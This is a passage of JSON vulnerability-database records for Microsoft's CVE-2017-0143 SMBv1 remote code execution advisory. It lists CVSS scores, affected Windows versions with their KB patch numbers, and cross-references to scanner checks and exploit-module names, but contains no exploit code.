installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": 
""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", 
"msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-09T05:02:02", "differentElements": ["msAffectedSoftware"], "edition": 23}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-09T06:50:25", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", 
"RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012214", "KB4012217", "KB4012216", "KB4013198", "KB3212646", "KBMS16-110, 3187754", "KB4012215", "KB3210721", "KB3177186", "KB4012598", "KB3205401", "KB4013429", "KB4012213", "KB4012606", "KB3213986", "KB3210720", "KB4012212"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-09T06:50:25", "differentElements": ["msAffectedSoftware"], "edition": 24}, {"bulletin": {"id": 
"MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-10T08:45:32", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": 
["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4012215", "KB3177186", "KB3205409", "KB4012598", "KBMS16-110, 3187754", "KB3213986", "KB4012217", "KB4013198", "KB4013429", "KB3210720", "KB4012606", "KB4012213", "KB3210721", "KB4012216", "KB4012214", "KB4012212", "KB3212646"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": 
"KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": 
"KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", 
